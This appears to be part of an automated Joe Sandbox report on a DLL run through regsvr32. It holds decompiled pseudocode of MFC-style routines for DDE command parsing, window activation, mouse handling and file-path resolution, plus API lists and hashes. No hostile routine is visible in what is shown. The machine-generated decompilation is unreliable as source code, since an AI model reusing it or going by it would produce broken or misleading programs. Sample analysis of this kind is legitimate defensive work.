                                                                                                                								_t295 = E10027DD9(_t484 + 8, _t484 - 0x1c, 3);
                                                                                                                								 *((char*)(_t484 - 4)) = 0xe;
                                                                                                                								_t296 = E1001BBE2(_t378, _t295, _t474, 0, 0x1009db20, _t484, 0x1009db20);
                                                                                                                								__eflags = _t296;
                                                                                                                								_t378 = _t378 & 0xffffff00 | _t296 != 0x00000000;
                                                                                                                								 *((char*)(_t484 - 4)) = 1;
                                                                                                                								L100013E3( *((intOrPtr*)(_t484 - 0x1c)) + 0xfffffff0, _t474);
                                                                                                                								__eflags = _t378;
                                                                                                                								if(__eflags != 0) {
                                                                                                                									goto L21;
                                                                                                                								}
                                                                                                                								_t302 = E10027D93(_t484 + 8, _t484 - 0x1c,  *((intOrPtr*)( *((intOrPtr*)(_t484 + 8)) - 0xc)) + 0xfffffffd);
                                                                                                                								 *((char*)(_t484 - 4)) = 0xf;
                                                                                                                								E10018A1F(_t378, _t484 + 8, _t484, _t302);
                                                                                                                								 *((char*)(_t484 - 4)) = 1;
                                                                                                                								L100013E3( *((intOrPtr*)(_t484 - 0x1c)) + 0xfffffff0, _t474);
                                                                                                                								_t378 = E10027BB5(_t484 + 8, 0x22, 0);
                                                                                                                								__eflags = _t378 - 0xffffffff;
                                                                                                                								if(__eflags == 0) {
                                                                                                                									goto L21;
                                                                                                                								}
                                                                                                                								_t307 = E10027DD9(_t484 + 8, _t484 - 0x1c, _t378);
                                                                                                                								 *((char*)(_t484 - 4)) = 0x10;
                                                                                                                								E10018A1F(_t378, _t484 - 0x24, _t484, _t307);
                                                                                                                								 *((char*)(_t484 - 4)) = 1;
                                                                                                                								L100013E3( *((intOrPtr*)(_t484 - 0x1c)) + 0xfffffff0, _t474);
                                                                                                                								_t314 = E10027D93(_t484 + 8, _t484 - 0x1c,  *((intOrPtr*)( *((intOrPtr*)(_t484 + 8)) - 0xc)) - _t378);
                                                                                                                								 *((char*)(_t484 - 4)) = 0x11;
                                                                                                                								E10018A1F(_t378, _t484 + 8, _t484, _t314);
                                                                                                                								 *((char*)(_t484 - 4)) = 1;
                                                                                                                								L100013E3( *((intOrPtr*)(_t484 - 0x1c)) + 0xfffffff0, _t474);
                                                                                                                								_t318 = E10027DD9(_t484 + 8, _t484 - 0x1c, 3);
                                                                                                                								 *((char*)(_t484 - 4)) = 0x12;
                                                                                                                								_t319 = E1001BBE2(_t378, _t318, _t474, 0, 0x1009db20, _t484, 0x1009db20);
                                                                                                                								__eflags = _t319;
                                                                                                                								_t378 = _t378 & 0xffffff00 | _t319 != 0x00000000;
                                                                                                                								 *((char*)(_t484 - 4)) = 1;
                                                                                                                								L100013E3( *((intOrPtr*)(_t484 - 0x1c)) + 0xfffffff0, _t474);
                                                                                                                								__eflags = _t378;
                                                                                                                								if(__eflags != 0) {
                                                                                                                									goto L21;
                                                                                                                								}
                                                                                                                								_t325 = E10027D93(_t484 + 8, _t484 - 0x1c,  *((intOrPtr*)( *((intOrPtr*)(_t484 + 8)) - 0xc)) + 0xfffffffd);
                                                                                                                								 *((char*)(_t484 - 4)) = 0x13;
                                                                                                                								E10018A1F(_t378, _t484 + 8, _t484, _t325);
                                                                                                                								 *((char*)(_t484 - 4)) = 1;
                                                                                                                								L100013E3( *((intOrPtr*)(_t484 - 0x1c)) + 0xfffffff0, _t474);
                                                                                                                								_t328 = E10027BB5(_t484 + 8, 0x22, 0);
                                                                                                                								_t479 = _t328;
                                                                                                                								__eflags = _t328 - 0xffffffff;
                                                                                                                								if(__eflags == 0) {
                                                                                                                									goto L21;
                                                                                                                								}
                                                                                                                								_t330 = E10027DD9(_t484 + 8, _t484 - 0x1c, _t479);
                                                                                                                								 *((char*)(_t484 - 4)) = 0x14;
                                                                                                                								E10018A1F(_t378, _t484 - 0x20, _t484, _t330);
                                                                                                                								 *((char*)(_t484 - 4)) = 1;
                                                                                                                								L100013E3( *((intOrPtr*)(_t484 - 0x1c)) + 0xfffffff0, _t474);
                                                                                                                								_t337 = E10027D93(_t484 + 8, _t484 - 0x1c,  *((intOrPtr*)( *((intOrPtr*)(_t484 + 8)) - 0xc)) - _t479);
                                                                                                                								 *((char*)(_t484 - 4)) = 0x15;
                                                                                                                								E10018A1F(_t378, _t484 + 8, _t484, _t337);
                                                                                                                								__eflags =  *((intOrPtr*)(_t484 - 0x1c)) + 0xfffffff0;
                                                                                                                								 *((char*)(_t484 - 4)) = 1;
                                                                                                                								L100013E3( *((intOrPtr*)(_t484 - 0x1c)) + 0xfffffff0, _t474);
                                                                                                                								goto L28;
                                                                                                                							}
                                                                                                                							L21:
                                                                                                                							 *((intOrPtr*)(_t484 - 0x10)) = 0;
                                                                                                                							goto L32;
                                                                                                                						} else {
                                                                                                                							_t378 =  *( *((intOrPtr*)(E1001E302(1, 0, _t478, _t489) + 4)) + 0x20);
                                                                                                                							_t480 =  *((intOrPtr*)( *((intOrPtr*)(E1001E302(_t378, 0, _t478, _t489) + 4)) + 0x4c));
                                                                                                                							if(_t480 == 0xffffffff || _t480 == 1) {
                                                                                                                								_t344 = IsIconic( *(_t378 + 0x20));
                                                                                                                								asm("sbb esi, esi");
                                                                                                                								_t479 = ( ~_t344 & 0x00000004) + 5;
                                                                                                                							}
                                                                                                                							E1001793D(_t378, _t479);
                                                                                                                							_t493 = _t479 - 6;
                                                                                                                							if(_t479 != 6) {
                                                                                                                								SetForegroundWindow( *(_t378 + 0x20));
                                                                                                                							}
                                                                                                                							_t347 =  *((intOrPtr*)(E1001E302(_t378, 0, _t479, _t493) + 4));
                                                                                                                							_t474 =  *_t347;
                                                                                                                							_t471 = _t347;
                                                                                                                							 *((intOrPtr*)( *_t347 + 0x88))( *((intOrPtr*)(_t484 - 0x2c)));
                                                                                                                							_t349 = E10022028();
                                                                                                                							_t494 = _t349;
                                                                                                                							if(_t349 == 0) {
                                                                                                                								E10022019(_t471, 1);
                                                                                                                							}
                                                                                                                							 *( *((intOrPtr*)(E1001E302(_t378, 0, _t479, _t494) + 4)) + 0x4c) =  *( *((intOrPtr*)(E1001E302(_t378, 0, _t479, _t494) + 4)) + 0x4c) | 0xffffffff;
                                                                                                                							L32:
                                                                                                                							 *((intOrPtr*)( *((intOrPtr*)(E1001E302(_t378, 0, _t479, _t494) + 4)) + 0x8c)) =  *((intOrPtr*)(_t484 - 0x18));
                                                                                                                							 *((char*)(_t484 - 4)) = 0;
                                                                                                                							E10019D3C(_t484 - 0x40, _t474);
                                                                                                                							L100013E3( *((intOrPtr*)(_t484 + 8)) + 0xfffffff0, _t474);
                                                                                                                							_t221 =  *((intOrPtr*)(_t484 - 0x10));
                                                                                                                							goto L34;
                                                                                                                						}
                                                                                                                					}
                                                                                                                					 *((intOrPtr*)(_t484 - 0x30)) = 2;
                                                                                                                					_t227 = E10027D93(_t390, _t484 - 0x18,  *((intOrPtr*)( *((intOrPtr*)(_t484 + 8)) - 0xc)) + 0xfffffff8);
                                                                                                                					 *((char*)(_t484 - 4)) = 5;
                                                                                                                					goto L6;
                                                                                                                				}
                                                                                                                				 *((intOrPtr*)(_t484 - 0x30)) = 1;
                                                                                                                				_t227 = E10027D93(_t386, _t484 - 0x18,  *((intOrPtr*)( *((intOrPtr*)(_t484 + 8)) - 0xc)) + 0xfffffff9);
                                                                                                                				 *((char*)(_t484 - 4)) = 3;
                                                                                                                				goto L6;
                                                                                                                			}










































                                                                                                                0x10028c9a
                                                                                                                0x10028cab
                                                                                                                0x10028cb1
                                                                                                                0x10028cb6
                                                                                                                0x10028cb8
                                                                                                                0x10028cbe
                                                                                                                0x10028cbe
                                                                                                                0x10028cc6
                                                                                                                0x10028cc8
                                                                                                                0x10028cdc
                                                                                                                0x10028cdc
                                                                                                                0x00000000
                                                                                                                0x10028cc8
                                                                                                                0x100289cb
                                                                                                                0x100289d0
                                                                                                                0x100289d8
                                                                                                                0x100289dc
                                                                                                                0x100289e4
                                                                                                                0x100289e6
                                                                                                                0x100289ec
                                                                                                                0x100289f0
                                                                                                                0x100289f5
                                                                                                                0x100289f7
                                                                                                                0x10028a12
                                                                                                                0x10028a1b
                                                                                                                0x10028a1f
                                                                                                                0x10028a2a
                                                                                                                0x10028a2e
                                                                                                                0x10028a3e
                                                                                                                0x10028a40
                                                                                                                0x10028a43
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10028a4d
                                                                                                                0x10028a56
                                                                                                                0x10028a5a
                                                                                                                0x10028a65
                                                                                                                0x10028a69
                                                                                                                0x10028a7e
                                                                                                                0x10028a87
                                                                                                                0x10028a8b
                                                                                                                0x10028a96
                                                                                                                0x10028a9a
                                                                                                                0x10028aa8
                                                                                                                0x10028ab0
                                                                                                                0x10028ab4
                                                                                                                0x10028abc
                                                                                                                0x10028abe
                                                                                                                0x10028ac4
                                                                                                                0x10028ac8
                                                                                                                0x10028acd
                                                                                                                0x10028acf
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10028ae6
                                                                                                                0x10028aef
                                                                                                                0x10028af3
                                                                                                                0x10028afe
                                                                                                                0x10028b02
                                                                                                                0x10028b12
                                                                                                                0x10028b14
                                                                                                                0x10028b17
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10028b25
                                                                                                                0x10028b2e
                                                                                                                0x10028b32
                                                                                                                0x10028b3d
                                                                                                                0x10028b41
                                                                                                                0x10028b56
                                                                                                                0x10028b5f
                                                                                                                0x10028b63
                                                                                                                0x10028b6e
                                                                                                                0x10028b72
                                                                                                                0x10028b80
                                                                                                                0x10028b88
                                                                                                                0x10028b8c
                                                                                                                0x10028b94
                                                                                                                0x10028b96
                                                                                                                0x10028b9c
                                                                                                                0x10028ba0
                                                                                                                0x10028ba5
                                                                                                                0x10028ba7
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10028bbe
                                                                                                                0x10028bc7
                                                                                                                0x10028bcb
                                                                                                                0x10028bd6
                                                                                                                0x10028bda
                                                                                                                0x10028be5
                                                                                                                0x10028bea
                                                                                                                0x10028bec
                                                                                                                0x10028bef
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10028bfd
                                                                                                                0x10028c06
                                                                                                                0x10028c0a
                                                                                                                0x10028c15
                                                                                                                0x10028c19
                                                                                                                0x10028c2e
                                                                                                                0x10028c37
                                                                                                                0x10028c3b
                                                                                                                0x10028c43
                                                                                                                0x10028c46
                                                                                                                0x10028c4a
                                                                                                                0x00000000
                                                                                                                0x10028c4a
                                                                                                                0x100289f9
                                                                                                                0x100289f9
                                                                                                                0x00000000
                                                                                                                0x10028937
                                                                                                                0x1002893f
                                                                                                                0x1002894a
                                                                                                                0x10028950
                                                                                                                0x1002895a
                                                                                                                0x10028964
                                                                                                                0x10028969
                                                                                                                0x10028969
                                                                                                                0x1002896f
                                                                                                                0x10028974
                                                                                                                0x10028977
                                                                                                                0x1002897c
                                                                                                                0x1002897c
                                                                                                                0x10028987
                                                                                                                0x1002898d
                                                                                                                0x1002898f
                                                                                                                0x10028991
                                                                                                                0x10028997
                                                                                                                0x1002899c
                                                                                                                0x1002899e
                                                                                                                0x100289a2
                                                                                                                0x100289a2
                                                                                                                0x100289af
                                                                                                                0x10028ce2
                                                                                                                0x10028ced
                                                                                                                0x10028cf6
                                                                                                                0x10028cfa
                                                                                                                0x10028d05
                                                                                                                0x10028d0a
                                                                                                                0x00000000
                                                                                                                0x10028d0a
                                                                                                                0x10028931
                                                                                                                0x100287d8
                                                                                                                0x100287ea
                                                                                                                0x100287ef
                                                                                                                0x00000000
                                                                                                                0x100287ef
                                                                                                                0x1002877c
                                                                                                                0x1002878e
                                                                                                                0x10028793
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                • __EH_prolog3.LIBCMT ref: 10028712
                                                                                                                  • Part of subcall function 1000B543: __EH_prolog3.LIBCMT ref: 1000B54A
                                                                                                                • IsIconic.USER32(?), ref: 1002895A
                                                                                                                • SetForegroundWindow.USER32 ref: 1002897C
                                                                                                                • SendMessageA.USER32 ref: 10028C9A
                                                                                                                • PostMessageA.USER32(?,00000010,00000000,00000000), ref: 10028CDC
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog3Message$ForegroundIconicPostSendWindow
                                                                                                                • String ID: ","$[open("$[print("$[printto("
                                                                                                                • API String ID: 2890980707-3790869113
                                                                                                                • Opcode ID: cab5bcdf4f39233bc5da1e22a27491cb8e2c22cc75d36e6d7f6608394fe4475a
                                                                                                                • Instruction ID: 6359ff3b39906331c569c86d2e27c1c2dd48ed764babf81416da55da0d5d941e
                                                                                                                • Opcode Fuzzy Hash: cab5bcdf4f39233bc5da1e22a27491cb8e2c22cc75d36e6d7f6608394fe4475a
                                                                                                                • Instruction Fuzzy Hash: 6F128239901148EFDB00DBB4C895AED7BB4FF14314F148259F956AB2D2DB70AB44CBA1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 86%
                                                                                                                			E10043612(void* __ebx, intOrPtr* __ecx, void* __eflags, intOrPtr _a4) {
                                                                                                                				signed int _v8;
                                                                                                                				signed int _v12;
                                                                                                                				intOrPtr _v16;
                                                                                                                				signed int _v20;
                                                                                                                				struct tagPOINT _v28;
                                                                                                                				intOrPtr _v40;
                                                                                                                				signed int _v72;
                                                                                                                				char _v76;
                                                                                                                				void* __edi;
                                                                                                                				void* __esi;
                                                                                                                				void* __ebp;
                                                                                                                				signed int _t60;
                                                                                                                				signed int _t62;
                                                                                                                				signed int _t63;
                                                                                                                				signed int _t67;
                                                                                                                				signed int _t70;
                                                                                                                				intOrPtr _t72;
                                                                                                                				signed int _t79;
                                                                                                                				short _t80;
                                                                                                                				short _t87;
                                                                                                                				short _t92;
                                                                                                                				intOrPtr _t111;
                                                                                                                				intOrPtr _t115;
                                                                                                                				intOrPtr _t116;
                                                                                                                				intOrPtr* _t118;
                                                                                                                
                                                                                                                				_t115 = _a4;
                                                                                                                				_t118 = __ecx;
                                                                                                                				if(E10011BA4(__ecx, __eflags, _t115) == 0) {
                                                                                                                					_t116 =  *((intOrPtr*)(_t115 + 4));
                                                                                                                					_push(__ebx);
                                                                                                                					_t100 = __ecx;
                                                                                                                					_t60 = E100155FD(__ecx);
                                                                                                                					__eflags =  *(__ecx + 0x80) & 0x00000020;
                                                                                                                					_v20 = _t60;
                                                                                                                					if(( *(__ecx + 0x80) & 0x00000020) != 0) {
                                                                                                                						L5:
                                                                                                                						__eflags = _t116 - 0x200;
                                                                                                                						if(_t116 < 0x200) {
                                                                                                                							L7:
                                                                                                                							__eflags = _t116 - 0xa0 - 9;
                                                                                                                							if(__eflags > 0) {
                                                                                                                								L30:
                                                                                                                								_t62 = E10014BA7(_t118);
                                                                                                                								__eflags = _t62;
                                                                                                                								if(_t62 == 0) {
                                                                                                                									L32:
                                                                                                                									__eflags = _v20;
                                                                                                                									if(_v20 == 0) {
                                                                                                                										L35:
                                                                                                                										_t63 = IsWindow( *(_t118 + 0x20));
                                                                                                                										__eflags = _t63;
                                                                                                                										if(_t63 == 0) {
                                                                                                                											L37:
                                                                                                                											__eflags = 0;
                                                                                                                											return 0;
                                                                                                                										}
                                                                                                                										return E10012240(_a4);
                                                                                                                									} else {
                                                                                                                										goto L33;
                                                                                                                									}
                                                                                                                									while(1) {
                                                                                                                										L33:
                                                                                                                										_t117 = _v20;
                                                                                                                										_t67 =  *((intOrPtr*)( *_v20 + 0x100))(_a4);
                                                                                                                										__eflags = _t67;
                                                                                                                										if(_t67 != 0) {
                                                                                                                											goto L1;
                                                                                                                										}
                                                                                                                										_t70 = E10014B68(_t117);
                                                                                                                										__eflags = _t70;
                                                                                                                										_v20 = _t70;
                                                                                                                										if(_t70 != 0) {
                                                                                                                											continue;
                                                                                                                										}
                                                                                                                										goto L35;
                                                                                                                									}
                                                                                                                									goto L1;
                                                                                                                								}
                                                                                                                								__eflags =  *(_t62 + 0x68);
                                                                                                                								if( *(_t62 + 0x68) != 0) {
                                                                                                                									goto L37;
                                                                                                                								}
                                                                                                                								goto L32;
                                                                                                                							}
                                                                                                                							L8:
                                                                                                                							_v16 = E1001E375(0x201, _t100, _t116, _t118, __eflags);
                                                                                                                							_t72 = _a4;
                                                                                                                							_v28.y =  *((intOrPtr*)(_t72 + 0x18));
                                                                                                                							_v28.x =  *(_t72 + 0x14);
                                                                                                                							ScreenToClient( *(_t118 + 0x20),  &_v28);
                                                                                                                							E10049170(_t116,  &_v76, 0, 0x30);
                                                                                                                							_v76 = 0x28;
                                                                                                                							_t79 =  *((intOrPtr*)( *_t118 + 0x6c))(_v28.x, _v28.y,  &_v76);
                                                                                                                							__eflags = _v40 - 0xffffffff;
                                                                                                                							_v8 = _t79;
                                                                                                                							if(__eflags != 0) {
                                                                                                                								_push(_v40);
                                                                                                                								E100470E9(0x201, _t116, _t118, __eflags);
                                                                                                                							}
                                                                                                                							__eflags = _t116 - 0x201;
                                                                                                                							if(_t116 != 0x201) {
                                                                                                                								L13:
                                                                                                                								_v12 = _v12 & 0x00000000;
                                                                                                                								__eflags = _t116 - 0x201;
                                                                                                                								if(_t116 != 0x201) {
                                                                                                                									_t92 = GetKeyState(1);
                                                                                                                									__eflags = _t92;
                                                                                                                									if(_t92 < 0) {
                                                                                                                										_v8 =  *((intOrPtr*)(_v16 + 0x4c));
                                                                                                                									}
                                                                                                                								}
                                                                                                                								L16:
                                                                                                                								__eflags = _v8;
                                                                                                                								if(_v8 < 0) {
                                                                                                                									L26:
                                                                                                                									_t80 = GetKeyState(1);
                                                                                                                									__eflags = _t80;
                                                                                                                									if(_t80 >= 0) {
                                                                                                                										L28:
                                                                                                                										 *((intOrPtr*)( *_t118 + 0x164))(0xffffffff);
                                                                                                                										KillTimer( *(_t118 + 0x20), 0xe001);
                                                                                                                										L29:
                                                                                                                										 *((intOrPtr*)(_v16 + 0x4c)) = _v8;
                                                                                                                										goto L30;
                                                                                                                									}
                                                                                                                									__eflags = _v12;
                                                                                                                									if(_v12 == 0) {
                                                                                                                										goto L29;
                                                                                                                									}
                                                                                                                									goto L28;
                                                                                                                								}
                                                                                                                								__eflags = _v12;
                                                                                                                								if(_v12 != 0) {
                                                                                                                									goto L26;
                                                                                                                								}
                                                                                                                								__eflags = _t116 - 0x202;
                                                                                                                								if(_t116 != 0x202) {
                                                                                                                									__eflags =  *(_t118 + 0x7c) & 0x00000008;
                                                                                                                									if(( *(_t118 + 0x7c) & 0x00000008) != 0) {
                                                                                                                										L25:
                                                                                                                										 *((intOrPtr*)( *_t118 + 0x164))(_v8);
                                                                                                                										goto L29;
                                                                                                                									}
                                                                                                                									_t87 = GetKeyState(1);
                                                                                                                									__eflags = _t87;
                                                                                                                									if(_t87 < 0) {
                                                                                                                										goto L25;
                                                                                                                									}
                                                                                                                									_t111 = _v16;
                                                                                                                									__eflags = _v8 -  *((intOrPtr*)(_t111 + 0x4c));
                                                                                                                									if(_v8 ==  *((intOrPtr*)(_t111 + 0x4c))) {
                                                                                                                										goto L29;
                                                                                                                									}
                                                                                                                									_push(0x12c);
                                                                                                                									_push(0xe000);
                                                                                                                									L20:
                                                                                                                									E10042CB1(_t118);
                                                                                                                									goto L29;
                                                                                                                								}
                                                                                                                								 *((intOrPtr*)( *_t118 + 0x164))(0xffffffff);
                                                                                                                								_push(0xc8);
                                                                                                                								_push(0xe001);
                                                                                                                								goto L20;
                                                                                                                							}
                                                                                                                							__eflags = _v72 & 0x80000000;
                                                                                                                							if((_v72 & 0x80000000) == 0) {
                                                                                                                								goto L13;
                                                                                                                							}
                                                                                                                							_v12 = 1;
                                                                                                                							goto L16;
                                                                                                                						}
                                                                                                                						__eflags = _t116 - 0x209;
                                                                                                                						if(__eflags <= 0) {
                                                                                                                							goto L8;
                                                                                                                						}
                                                                                                                						goto L7;
                                                                                                                					}
                                                                                                                					__eflags = _t116 - 0x201;
                                                                                                                					if(_t116 == 0x201) {
                                                                                                                						goto L5;
                                                                                                                					}
                                                                                                                					__eflags = _t116 - 0x202;
                                                                                                                					if(_t116 != 0x202) {
                                                                                                                						goto L30;
                                                                                                                					}
                                                                                                                					goto L5;
                                                                                                                				}
                                                                                                                				L1:
                                                                                                                				return 1;
                                                                                                                			}




























                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004371a
                                                                                                                0x10043720
                                                                                                                0x10043741
                                                                                                                0x10043745
                                                                                                                0x1004376b
                                                                                                                0x10043772
                                                                                                                0x00000000
                                                                                                                0x10043772
                                                                                                                0x10043749
                                                                                                                0x1004374f
                                                                                                                0x10043752
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10043757
                                                                                                                0x1004375a
                                                                                                                0x1004375d
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004375f
                                                                                                                0x10043764
                                                                                                                0x10043738
                                                                                                                0x1004373a
                                                                                                                0x00000000
                                                                                                                0x1004373a
                                                                                                                0x10043728
                                                                                                                0x1004372e
                                                                                                                0x10043733
                                                                                                                0x00000000
                                                                                                                0x10043733
                                                                                                                0x100436de
                                                                                                                0x100436e5
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x100436e7
                                                                                                                0x00000000
                                                                                                                0x100436e7
                                                                                                                0x10043665
                                                                                                                0x1004366b
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1004366b
                                                                                                                0x1004364d
                                                                                                                0x1004364f
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10043651
                                                                                                                0x10043657
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10043657
                                                                                                                0x10043629
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ClientScreenWindow_memset
                                                                                                                • String ID: (
                                                                                                                • API String ID: 1268500159-3887548279
                                                                                                                • Opcode ID: 64ed9addaf683a1b86ec6b4ffff91413ac46c86aa955f030dd97174b6ef85283
                                                                                                                • Instruction ID: 62187ba6e2ba40476ccf44bbc32d417699c02d7eb00345c65f8ec2bcc569b145
                                                                                                                • Opcode Fuzzy Hash: 64ed9addaf683a1b86ec6b4ffff91413ac46c86aa955f030dd97174b6ef85283
                                                                                                                • Instruction Fuzzy Hash: 7C51BEB4A04245EFDB20DFA4C889B9DBBF1EF44350F329079E942E7291DB719A80CB45
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 88%
                                                                                                                			E1002992A(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                				void* __ebp;
                                                                                                                				signed int _t38;
                                                                                                                				long _t49;
                                                                                                                				CHAR* _t50;
                                                                                                                				CHAR* _t56;
                                                                                                                				CHAR* _t59;
                                                                                                                				void* _t61;
                                                                                                                				int _t65;
                                                                                                                				CHAR* _t74;
                                                                                                                				void* _t75;
                                                                                                                				void* _t76;
                                                                                                                				void* _t89;
                                                                                                                				void* _t90;
                                                                                                                				CHAR* _t92;
                                                                                                                				void* _t93;
                                                                                                                				void* _t96;
                                                                                                                				struct _WIN32_FIND_DATAA* _t98;
                                                                                                                				void* _t100;
                                                                                                                				CHAR* _t106;
                                                                                                                
                                                                                                                				_t94 = __esi;
                                                                                                                				_t90 = __edx;
                                                                                                                				_t76 = __ecx;
                                                                                                                				_t98 = _t100 - 0x13c;
                                                                                                                				_t38 =  *0x100b9e70; // 0xbb35530
                                                                                                                				 *(_t98 + 0x140) = _t38 ^ _t98;
                                                                                                                				_push(0x14);
                                                                                                                				E1004764D(0x1008ff07, __ebx, __edi, __esi);
                                                                                                                				_t92 =  *(_t98 + 0x14c);
                                                                                                                				_t74 =  *(_t98 + 0x150);
                                                                                                                				 *((intOrPtr*)(_t98 - 0x18)) =  *((intOrPtr*)(_t98 + 0x154));
                                                                                                                				_t106 = _t92;
                                                                                                                				_t107 = _t106 == 0;
                                                                                                                				if(_t106 == 0) {
                                                                                                                					L1:
                                                                                                                					E1000A069(_t74, _t76, _t92, _t94, _t107);
                                                                                                                				}
                                                                                                                				if((0 | _t74 != 0x00000000) == 0) {
                                                                                                                					goto L1;
                                                                                                                				}
                                                                                                                				_t49 = GetFullPathNameA(_t74, 0x104, _t92, _t98 - 0x14);
                                                                                                                				if(_t49 != 0) {
                                                                                                                					__eflags = _t49 - 0x104;
                                                                                                                					if(_t49 >= 0x104) {
                                                                                                                						goto L5;
                                                                                                                					} else {
                                                                                                                						L1000140B(_t98 - 0x10, E100184C0());
                                                                                                                						 *(_t98 - 4) =  *(_t98 - 4) & 0x00000000;
                                                                                                                						E10029760(_t74, _t98, __eflags, _t92, _t98 - 0x10);
                                                                                                                						_t56 = PathIsUNCA( *(_t98 - 0x10));
                                                                                                                						__eflags = _t56;
                                                                                                                						if(_t56 != 0) {
                                                                                                                							L19:
                                                                                                                							L100013E3( &(( *(_t98 - 0x10))[0xfffffffffffffff0]), _t90);
                                                                                                                							_t50 = 1;
                                                                                                                							__eflags = 1;
                                                                                                                						} else {
                                                                                                                							_t59 = GetVolumeInformationA( *(_t98 - 0x10), _t56, _t56, _t56, _t98 - 0x20, _t98 - 0x1c, _t56, _t56);
                                                                                                                							__eflags = _t59;
                                                                                                                							if(_t59 != 0) {
                                                                                                                								__eflags =  *(_t98 - 0x1c) & 0x00000002;
                                                                                                                								if(( *(_t98 - 0x1c) & 0x00000002) == 0) {
                                                                                                                									CharUpperA(_t92);
                                                                                                                								}
                                                                                                                								__eflags =  *(_t98 - 0x1c) & 0x00000004;
                                                                                                                								if(( *(_t98 - 0x1c) & 0x00000004) != 0) {
                                                                                                                									goto L19;
                                                                                                                								} else {
                                                                                                                									_t61 = FindFirstFileA(_t74, _t98);
                                                                                                                									__eflags = _t61 - 0xffffffff;
                                                                                                                									if(_t61 == 0xffffffff) {
                                                                                                                										goto L19;
                                                                                                                									} else {
                                                                                                                										FindClose(_t61);
                                                                                                                										__eflags =  *(_t98 - 0x14);
                                                                                                                										if( *(_t98 - 0x14) == 0) {
                                                                                                                											goto L10;
                                                                                                                										} else {
                                                                                                                											__eflags =  *(_t98 - 0x14) - _t92;
                                                                                                                											if( *(_t98 - 0x14) <= _t92) {
                                                                                                                												goto L10;
                                                                                                                											} else {
                                                                                                                												_t65 = lstrlenA( &(_t98->cFileName));
                                                                                                                												_t89 =  *(_t98 - 0x14) - _t92;
                                                                                                                												__eflags = _t65 + _t89 - 0x104;
                                                                                                                												if(_t65 + _t89 >= 0x104) {
                                                                                                                													goto L10;
                                                                                                                												} else {
                                                                                                                													_t97 = 0x104 - _t89;
                                                                                                                													__eflags = 0x104 - _t89;
                                                                                                                													E10019530(_t74, _t90, _t92, 0x104 - _t89, _t98,  *(_t98 - 0x14), _t97,  &(_t98->cFileName));
                                                                                                                													goto L19;
                                                                                                                												}
                                                                                                                											}
                                                                                                                										}
                                                                                                                									}
                                                                                                                								}
                                                                                                                							} else {
                                                                                                                								_push(_t74);
                                                                                                                								E100298FF( *((intOrPtr*)(_t98 - 0x18)));
